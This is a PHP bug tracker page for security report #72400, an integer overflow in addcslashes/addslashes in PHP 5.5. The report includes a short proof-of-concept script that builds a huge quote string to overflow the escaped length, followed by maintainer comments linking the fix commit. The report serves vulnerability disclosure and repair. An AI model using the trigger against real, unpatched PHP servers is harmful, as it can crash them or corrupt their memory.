php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #72400 Integer Overflow in addcslashes/addslashes
Submitted: 2016-06-14 09:41 UTC Modified: 2016-06-21 06:46 UTC
From: taoguangchen at icloud dot com Assigned: stas (profile)
Status: Closed Package: *General Issues
PHP Version: 5.5.36 OS:
Private report: No CVE-ID: None
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: taoguangchen at icloud dot com
New email:
PHP Version: OS:

 

 [2016-06-14 09:41 UTC] taoguangchen at icloud dot com
Description:
------------
PoC:

```
<?php

ini_set('memory_limit', -1);
$str = str_repeat("'", 0xffffffff/4+1);
$str = addcslashes($str, "'");
//$str = addslashes($str);
var_dump(strlen($str));

?>
```


Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2016-06-16 04:50 UTC] stas@php.net
-Assigned To: +Assigned To: stas
 [2016-06-16 04:50 UTC] stas@php.net
See fix in bug #72403
 [2016-06-21 06:49 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=88746d60ab3ad51797612ee62603bb3e08d4aac4
Log: Fix bug #72400 and #72403 - prevent signed int overflows for string lengths
 [2016-06-21 06:49 UTC] stas@php.net
-Status: Assigned +Status: Closed
 [2016-06-21 07:03 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=88746d60ab3ad51797612ee62603bb3e08d4aac4
Log: Fix bug #72400 and #72403 - prevent signed int overflows for string lengths
 [2016-06-21 07:26 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=88746d60ab3ad51797612ee62603bb3e08d4aac4
Log: Fix bug #72400 and #72403 - prevent signed int overflows for string lengths
 [2016-06-21 07:27 UTC] stas@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=88746d60ab3ad51797612ee62603bb3e08d4aac4
Log: Fix bug #72400 and #72403 - prevent signed int overflows for string lengths
 [2016-06-22 05:58 UTC] krakjoe@php.net
Automatic comment on behalf of stas
Revision: http://git.php.net/?p=php-src.git;a=commit;h=88746d60ab3ad51797612ee62603bb3e08d4aac4
Log: Fix bug #72400 and #72403 - prevent signed int overflows for string lengths
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved.
Last updated: Sat Nov 23 08:01:28 2024 UTC